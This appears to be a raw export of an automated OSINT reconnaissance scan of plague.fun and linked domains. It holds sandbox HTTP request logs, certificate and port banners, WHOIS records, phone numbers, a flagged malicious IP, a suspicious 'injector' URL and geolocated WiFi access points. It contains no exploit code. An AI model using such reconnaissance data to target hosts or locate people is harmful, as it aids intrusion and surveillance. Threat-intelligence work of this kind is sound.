uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /assets/js/functions.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /assets/js/functions.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /assets/css/normalize.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /assets/css/normalize.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /assets/images/i.png HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /assets/images/i.png HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: uuuytttt89999.57f7f7cff7f7f.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /css2?family=Roboto:wght@100;400;500;700;900&display=swap HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /css2?family=Roboto:wght@100;400;500;700;900&display=swap HTTP/1.1\nAccept: text/css, */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: fonts.googleapis.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmWUlvAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmWUlvAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOkCnqEu92Fr1MmgWxM.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOkCnqEu92Fr1MmgWxM.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOmCnqEu92Fr1Me5g.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOmCnqEu92Fr1Me5g.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmYUtvAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmYUtvAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmEU9vAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /s/roboto/v30/KFOlCnqEu92Fr1MmEU9vAA.woff HTTP/1.1\nAccept: */*\nReferer: https://uuuytttt89999.57f7f7cff7f7f.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://uuuytttt89999.57f7f7cff7f7f.repl.co\nAccept-Encoding: gzip, deflate\nHost: fonts.gstatic.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "142.251.211.234:443"\n "142.250.217.99:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informativ 34.149.204.188 2022-12-18 00:22:01 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b1f5531bc02c54-ORD Content-Encoding: gzip 2a06:98c1:3121::1 2022-12-18 00:03:02 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:54:d1:cf:73:f4:06:da:67:36:31:1b:04:19:11:b7:02:21 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:41:57 2022 GMT Not After : Jun 6 17:41:56 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:99:c4:36:4d:b6:7c:39:c2:f1:77:60:a8:ba:f8: 1c:59:3e:dd:96:42:44:67:b8:8b:49:69:58:1a:9d: ae:aa:d4:88:d9:2c:d6:c2:df:95:1d:df:ac:20:80: f6:6c:90:00:e7:ce:f6:99:5d:a6:86:c6:4c:71:e4: 0a:11:87:6e:9d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 7C:C0:30:0A:42:D8:F4:C5:D8:B9:9F:B1:0D:6A:DF:8F:DE:76:96:BE X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Mar 8 18:41:57.493 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:70:F2:E0:AE:CF:85:A2:03:22:79:FB:17: 39:F6:2F:87:C6:15:E4:F1:18:13:A9:F1:82:72:E6:C7: 7E:9E:29:13:02:20:30:0A:4F:75:19:2A:CF:D1:C3:F7: A8:E4:23:2C:B2:7A:99:89:19:E6:BF:91:FC:02:88:FB: 7F:9C:BD:82:04:90 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Mar 8 18:41:57.948 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:5D:16:09:69:44:95:6C:EF:37:FF:ED:F6: DF:17:EC:69:D6:52:78:BA:45:66:C6:1B:4F:46:5D:AE: EF:24:43:F2:02:21:00:E1:1A:7D:CA:9B:93:9F:F9:9E: 3D:06:BC:DF:D0:E8:10:6C:83:BE:BC:7C:A3:59:72:65: 68:4A:22:D1:DB:28:92 Signature Algorithm: ecdsa-with-SHA384 30:66:02:31:00:85:09:85:22:e8:48:da:b2:41:e1:15:a0:ea: 71:65:bc:ea:15:0e:7c:ce:1f:90:f6:cf:0f:d0:23:48:68:37: 61:1a:b2:5a:5f:20:24:73:65:f2:d2:bf:f9:e7:6a:e6:1c:02: 31:00:b8:1a:26:15:77:4d:4a:dc:4f:46:e6:7c:94:6c:91:e2: 82:f4:4e:dd:4f:5d:d6:db:53:3e:d1:f2:6f:3d:cd:1c:82:3f: ed:11:fd:de:35:58:00:77:1d:b7:c3:45:b1:9e plague.fun 2022-12-18 00:16:35 Raw Data from RIRs No numverify 0 0 3 0 None {u'international_format': u'+3544212434', u'local_format': u'4212434', u'number': u'3544212434', u'valid': True, u'line_type': u'landline', u'location': u'', u'country_code': u'IS', u'carrier': u'', u'country_name': u'Iceland', u'country_prefix': u'+354'} +3544212434 2022-12-18 00:12:19 Phone Number No Phone Number Extractor 3 0 2 0 None +492283296859 Domain Name: PLAGUE.FUN Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-12-05T18:48:20.0Z Creation Date: 2022-01-08T12:59:17.0Z Registry Expiry Date: 2023-01-08T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: serverHold https://icann.org/epp#serverHold Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:49.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.fun Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-12-05T18:48:20.00Z Creation Date: 2022-01-08T12:59:00.00Z Registrar Registration Expiration Date: 2023-01-08T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: serverHold https://www.icann.org/epp#serverHold Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Alpes-Maritimes Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/177ad87c-41f0-4b87-926f-459f450a86e9 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTPS://ICANN.ORG/WICF >>> Last update of WHOIS database: 2022-12-18T00:02:49.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:13:04 Affiliate Description - Category No DuckDuckGo 0 0 3 0 None Companies formerly listed on the London Stock Exchange lfbn-nic-1-332-104.w90-116.abo.wanadoo.fr 2022-12-18 00:12:19 Phone Number No Phone Number Extractor 0 0 2 0 None +492283296859 Domain Name: ZEROTWO-BEST-WAIFU.ONLINE Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-01-11T15:03:40.0Z Creation Date: 2021-12-25T22:42:25.0Z Registry Expiry Date: 2022-12-25T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: zerotwo-best-waifu.online Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-01-11T15:03:40.00Z Creation Date: 2021-12-25T22:42:00.00Z Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: ok https://www.icann.org/epp#ok Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Paris Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:26:12 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.pl plague.fun 2022-12-18 00:27:16 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [188.114.96.3] 188.114.96.3 2022-12-18 00:02:39 Domain Name No SpiderFoot UI 46 0 0 0 None plague.fun plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:15:16 HTTP Status Code No Web Spider 0 0 2 0 None None https://zerotwo-best-waifu.online/778112985743251/wap/enner/injector 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:2095 172.67.190.129 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:09:F8:70) 37.780462,-122.390564 2022-12-18 00:22:07 Open TCP Port No Censys 0 1 2 0 None 34.149.204.188:5900 34.149.204.188 2022-12-18 00:07:06 HTTP Headers No Web Spider 2 0 2 0 None {"content-length": "68", "x-powered-by": "Express", "accept-ranges": "bytes", "keep-alive": "timeout=5", "last-modified": "Wed, 02 Nov 2022 16:43:18 GMT", "connection": "keep-alive", "etag": "W/\"44-1843939c80b\"", "cache-control": "public, max-age=0", "date": "Sun, 18 Dec 2022 00:07:06 GMT", "access-control-allow-origin": "*", "content-type": "text/html; charset=UTF-8"} http://misogyny.wtf:2020/copy 2022-12-18 00:09:44 Co-Hosted Site No HackerTarget 0 0 2 0 None ancient-cell-1aa7.2864713421.workers.dev 172.67.147.230 2022-12-18 00:13:44 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None abuse@register.it Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-05-22T07:28:29Z Creation Date: 2003-05-21T18:09:42Z Registry Expiry Date: 2023-05-21T18:09:42Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: ok https://icann.org/epp#ok Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:10:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: WEBAPPS.NET Registry Domain ID: 98172701_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-06-23T00:00:00Z Creation Date: 2011-01-25T00:00:00Z Registrar Registration Expiration Date: 2023-05-21T00:00:00Z Registrar: REGISTER S.P.A. Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqyskvzwym@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:11:00Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None 56544.56554.repl.co 34.149.204.188 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNetCBD2 (Net ID: 00:01:36:59:CB:D0) 37.780462,-122.390564 2022-12-18 00:23:10 Raw Data from RIRs No CRXcavator 1 0 1 0 None [{"platform": "Chrome", "version": "1342", "data": {"webstore": {"website": "", "rating": 0, "privacy_policy": "", "last_updated": "2018-09-27", "name": "Plague Inc", "price": "", "offered_by": "", "support_site": "", "version": "", "address": "", "short_description": "Can you infect the world? Plague Inc. is a unique mix of high strategy and terrifyingly realistic simulation.\n\nYour pathogen has\u2026", "permission_warnings": ["Your data on clients2.google.com", "Data you copy and paste"], "users": 253, "size": "50.13MiB", "type": "Application", "email": "anonymous69anonymous666@gmail.com", "rating_users": 0, "icon": 